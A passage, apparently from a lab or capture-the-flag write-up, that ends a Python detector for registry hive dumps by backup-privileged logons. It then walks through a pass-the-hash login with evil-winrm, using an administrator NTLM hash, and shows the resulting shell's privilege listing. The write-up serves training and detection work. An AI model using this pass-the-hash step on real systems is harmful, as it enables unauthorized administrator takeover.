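            m = HIVE_SAVE.search(str(ev["CommandLine"]))
            logon = str(ev["SubjectLogonId"])
            if m and logon in backup_logons:
                alerts.append({"severity": "high", "account": backup_logons[logon],
                               "hive": m.group(1).upper(),
                               "reason": "registry hive saved to disk by a backup-privileged logon"})
    return alerts


if __name__ == "__main__":
    for a in detect_hive_dump(EVENTS):
        print(a["severity"], a["account"], a.get("hive", ""), a["reason"])
```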

Log in with the administrator's hash to get root.

└─$ evil-winrm -i $IP -u Administrator  -H '2b87e7c93a3e8a0ea4a581937016f341'                                                                                                

Evil-WinRM shell v3.7                                                                                                                                                        

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                      

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                        

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                                                    State
=============================== ============================================================== =======
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process                             Enabled
SeMachineAccountPrivilege       Add workstations to domain                                     Enabled
SeSecurityPrivilege             Manage auditing and security log                               Enabled
SeLoadDriverPrivilege           Load and unload device drivers                                 Enabled
SeSystemProfilePrivilege        Profile system performance                                     Enabled
SeSystemtimePrivilege           Change the system time                                         Enabled
SeProfileSingleProcessPrivilege Profile single process                                         Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority                                   Enabled
SeCreatePagefilePrivilege       Create a pagefile                                              Enabled
SeBackupPrivilege               Back up files and directories                                  Enabled
SeRestorePrivilege              Restore files and directories                                  Enabled
SeShutdownPrivilege             Shut down the system                                           Enabled
SeDebugPrivilege                Debug programs                                                 Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values                             Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                                       Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system                            Enabled
SeUndockPrivilege               Remove computer from docking station                           Enabled
SeEnableDelegationPrivilege     Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege         Perform volume maintenance tasks                               Enabled
SeImpersonatePrivilege          Impersonate a client after authentication                      Enabled
SeCreateGlobalPrivilege         Create global objects                                          Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set                                 Enabled
SeTimeZonePrivilege             Change the time zone                                           Enabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                                          Enabled
